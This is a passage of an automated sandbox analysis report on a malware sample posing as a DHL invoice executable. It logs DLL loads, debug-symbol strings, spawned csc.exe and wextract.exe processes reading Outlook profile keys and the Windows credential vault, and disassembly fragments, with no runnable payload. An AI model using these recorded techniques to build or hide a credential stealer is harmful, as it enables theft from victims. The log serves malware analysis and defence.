            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeStatic file information: File size 3359817 > 1048576
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: .pdbHJp source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1846210334.000000F06B1F3000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: wextract.pdb source: csc.exe, 00000004.00000002.2074916274.00000000052B8000.00000004.00000020.00020000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000C.00000002.4139831429.0000000000A08000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb.0M source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: wntdll.pdb source: csc.exe, csc.exe, 00000004.00000003.1984836157.00000000053B5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000004.00000003.1986270313.0000000005569000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000004.00000002.2075036679.00000000058AE000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, wextract.exe, 0000000D.00000003.2076822878.0000000004230000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000003.2078180097.00000000043E1000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.PDB405(z source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1846210334.000000F06B1F3000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: StrongNameFreeBufferStrongNameTokenFromPublicKeyStrongNameErrorInfo.PDBdiasymreader.dllDllGetClassObject%X%X%X%X%X%X%X%X%X%X%X.TMP0x%016I64xCSCalink.dll with IAlink3 source: wextract.exe, 0000000D.00000002.4141477691.0000000004C6C000.00000004.10000000.00040000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140392586.0000000004237000.00000004.00000020.00020000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000000.2141501567.0000000002F2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2368705885.000000001EA9C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8DF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.ni.pdbRSDS source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: mscorlib.pdbh source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C840000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbk source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbh source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: csc.pdbF source: wextract.exe, 0000000D.00000002.4141477691.0000000004C6C000.00000004.10000000.00040000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140392586.0000000004237000.00000004.00000020.00020000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000000.2141501567.0000000002F2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2368705885.000000001EA9C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: pC:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.PDB source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1846210334.000000F06B1F3000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Core.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rQkTBkrqhGpTBn.exe, 0000000C.00000002.4139357076.00000000001EE000.00000002.00000001.01000000.00000009.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000000.2140751546.00000000001EE000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: mscorlib.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: csc.pdb source: wextract.exe, 0000000D.00000002.4141477691.0000000004C6C000.00000004.10000000.00040000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140392586.0000000004237000.00000004.00000020.00020000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000000.2141501567.0000000002F2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2368705885.000000001EA9C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Xml.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: wextract.pdbGCTL source: csc.exe, 00000004.00000002.2074916274.00000000052B8000.00000004.00000020.00020000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000C.00000002.4139831429.0000000000A08000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Xml.pdbp^ source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: wntdll.pdbUGP source: csc.exe, 00000004.00000003.1984836157.00000000053B5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000004.00000003.1986270313.0000000005569000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000004.00000002.2075036679.00000000058AE000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 0000000D.00000003.2076822878.0000000004230000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000003.2078180097.00000000043E1000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Configuration.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Core.pdbH source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Xml.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8DF000.00000004.00000020.00020000.00000000.sdmp, dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C840000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.PDB" source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1846210334.000000F06B1F3000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Management.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Drawing.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Management.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Core.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbiX source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8DF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER21A5.tmp.dmp.7.dr
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeStatic PE information: 0x916198D0 [Wed Apr 17 05:40:32 2047 UTC]
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeCode function: 0_2_00007FFD9B89792B push ebx; retf 0_2_00007FFD9B89796A
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeCode function: 0_2_00007FFD9B960050 push esp; retf 4810h0_2_00007FFD9B960312
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeCode function: 0_2_00007FFD9B9617B1 push ecx; iretd 0_2_00007FFD9B961A52
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0041A89F push es; iretd 4_2_0041A8A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_004180AE pushfd ; iretd 4_2_004180B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_00413A7D pushad ; retf 4_2_00413AEC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_00413AD6 pushad ; retf 4_2_00413AEC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_00413A94 pushad ; retf 4_2_00413AEC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_00413B02 pushad ; retf 4_2_00413AEC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0040D39C push ecx; ret 4_2_0040D3A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0040AC52 push edx; iretd 4_2_0040ACA3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0041EC7C pushfd ; retf 4_2_0041ECCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_00417410 push edi; retf 4_2_00417411
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_00402418 pushad ; retf 4_2_0040241B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_00415C85 push ds; retf 4_2_00415CA3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_00415CA5 push ds; retf 4_2_00415CA3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0041ECB8 pushfd ; retf 4_2_0041ECCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_00426D53 push esp; ret 4_2_00426D6D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_00413DF2 push 5FA4C71Eh; retf 4_2_00413DF8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_00403590 push eax; ret 4_2_00403592
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_00416DB7 push ebx; ret 4_2_00416DBE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_00408658 push esi; iretd 4_2_004086AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_00411668 push cs; ret 4_2_00411671
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0040CEC6 push esi; retf 4_2_0040CEC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_004086B0 push esi; iretd 4_2_004086AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0040C790 push esp; retf 4_2_0040C791
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057409AD push ecx; mov dword ptr [esp], ecx4_2_057409B6
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045C09AD push ecx; mov dword ptr [esp], ecx13_2_045C09B6
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_004050C5 push esi; iretd 13_2_0040511C
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0040E0D5 push cs; ret 13_2_0040E0DE
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_00420140 push ss; retn 3B9Dh13_2_004203D8

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
